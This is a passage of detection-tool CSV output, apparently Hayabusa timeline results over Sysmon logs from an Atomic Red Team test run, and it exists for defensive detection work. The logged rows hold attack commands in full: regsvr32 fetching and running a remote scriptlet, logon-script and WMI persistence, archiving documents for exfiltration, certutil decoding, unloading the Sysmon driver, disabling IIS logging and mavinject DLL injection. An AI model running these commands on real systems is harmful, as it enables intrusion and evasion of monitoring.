747F3D96-D978-5D31-0000-00101E7A3800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-D97A-5D31-0000-00105DA83800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7148 | PGUID: 747F3D96-D97A-5D31-0000-001089BD3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49728 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3564 | PGUID: 747F3D96-D97A-5D31-0000-00109DDC3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D97A-5D31-0000-001019DE3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4628 | PGUID: 747F3D96-D97A-5D31-0000-00102BE33800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: /s 
C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | LID: 0x50951 | PID: 5788 | PGUID: 747F3D96-D97B-5D31-0000-00109DEB3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D97B-5D31-0000-0010F0F03800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4240 | PGUID: 747F3D96-D982-5D31-0000-0010DC633900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD 
HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D983-5D31-0000-00102E663900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Persis | LatMov,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Persis,Common Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_common.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D989-5D31-0000-0010FC7B3900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2000 | PGUID: 
747F3D96-D998-5D31-0000-001008B43900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2424 | PGUID: 747F3D96-D998-5D31-0000-00101BB73900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.378 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: 
""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.806 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4832 | 
PGUID: 747F3D96-DA3F-5D31-0000-00104C173C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -encode c:\file.exe file.txt | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | LID: 0x50951 | PID: 1260 | PGUID: 747F3D96-DA3F-5D31-0000-00109E193C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4020 | PGUID: 747F3D96-DA3F-5D31-0000-0010562E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:57:03.974 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -decode file.txt c:\file.exe | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-DA3F-5D31-0000-001022323C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DA3F-5D31-0000-0010813E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6572 | PGUID: 747F3D96-DA40-5D31-0000-00106A543C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"" | LID: 0x50951 | PID: 5168 | PGUID: 747F3D96-DA40-5D31-0000-0010B1553C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-DA40-5D31-0000-0010CF5A3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"" | LID: 0x50951 | PID: 3932 | PGUID: 
747F3D96-DA40-5D31-0000-0010565D3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00 | Hash: SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil 
Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.600 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DA40-5D31-0000-0010E16B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3976 | PGUID: 747F3D96-DA4A-5D31-0000-0010C21F3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1012 | PGUID: 747F3D96-DA4A-5D31-0000-0010EE223D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config 
"" ""Default /section:httplogging /dontLog:true"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4056 | PGUID: 747F3D96-DA4A-5D31-0000-00106C293D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2584 | PGUID: 747F3D96-DA4A-5D31-0000-00107A2C3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll | Process: C:\Windows\System32\mavinject.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2604 | PGUID: 747F3D96-DA4B-5D31-0000-0010CB413D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,,MavInject Process Injection,,rules/sigma/process_creation/proc_creation_win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2596 | PGUID: 
747F3D96-DA4C-5D31-0000-0010655D3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-DA4C-5D31-0000-001077603D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-DA68-5D31-0000-001025713E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.073 